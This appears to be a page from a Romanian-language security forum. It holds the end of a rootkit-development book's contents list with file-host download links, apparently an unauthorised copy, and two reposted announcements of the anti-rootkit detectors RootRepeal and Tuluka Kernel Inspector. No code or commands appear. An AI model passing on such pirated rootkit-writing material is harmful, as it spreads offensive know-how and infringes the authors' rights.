TSMod . . . . . . . . . . 854 Project: Slack .. . . . . . . . . . 858 Project: MFT . . . . . . . . . . 860 Project: Cryptor . .. . . . . . . . . 871 Chapter 11 . . . .. .. . . . . . . . . 876 Project: UserModeDNS . . 876 Project: WSK-DNS . ....... . .... ... .. ... . .. 883 Index . ............. . . .. . 895 Download: http://www.mediafire.com/?7jl44499d94l3l9 http://www.megaupload.com/?d=C4TS6FFB Stiu ca mai e postata pe undeva pe aici, dar link-ul nu mai e valid iar cartea asta se merita descarcata.

[h=3]RootRepeal - New Rootkit Detector Tool[/h] RootRepeal is new kernel land based Anti-Rootkit tool which is simple to use yet powerful. Currently it is in beta version and as of now support only x86 systems. Main features Driver Scan - scans the system for kernel-mode drivers. Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver's file is visible on-disk. Files Scan - scans any fixed drive on the system for hidden, locked or falsified* files. Processes Scan - scans the system for processes. Displays all processes currently running, and shows if a processes is hidden or locked. SSDT Scan - shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked. Stealth Objects Scan - attempts to determine if any rootkits are active by looking for typical symptoms. Hidden Services Scan - scans for hidden system services. Shadow SSDT Scan - counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions. Due to nature of these kind of tools, you are always advised to have backups of all important data before running it. Also it is advised to run it on Virtual machines such as Vmware. For more interesting details and test it yourself, visit the project page of RootRepeal Download: http://ad13.geekstogo.com/RootRepeal.rar Sursa: SecurityXploded Forum • View topic - RootRepeal - New Rootkit Detector Tool

[h=3]Anti-Rootkit Tool - Tuluka Kernel Inspector[/h] Here's the new Anti-Rootkit tool - "Tuluka Kernel Inspector" - by Libertad from Tuluka.org. It has following core features Detects hidden processes, drivers and devices Detects IRP hooks Identifies the substitution of certain fields in DRIVER_OBJECT structure Checks driver signatures Detects and restores SSDT hooks Detects suspicious descriptors in GDT IDT hook detection SYSENTER hook detection Displays list of system threads and allows you to suspend them IAT and Inline hook detection Shows the actual values of the debug registers, even if reading these registers is controlled by someone Allows you to find the system module by the address within this module Allows you to display contents of kernel memory and save it to disk Allows you to dump kernel drivers and main modules of all processes Allows you to terminate any process Is able to dissasemble interrupt and IRP handlers, system services, start routines of system threads and many more Allows to build the stack for selected device Many more.. It is tested on following operating systems (32-bit), Windows XP SP0 SP1 SP2 SP3 Windows Server 2003 SP0 SP1 SP2 R2 Windows Vista SP0 SP1 SP2 Windows Server 2008 SP0 SP1 SP2 Windows 7 SP0 SP1 Though it currently supports only 32 bit version, support for 64 bit is expected in upcoming versions. You can download it from here: http://www.tuluka.org/Download.html Sursa: SecurityXploded Forum • View topic - New Anti-Rootkit Tool - Tuluka Kernel Inspector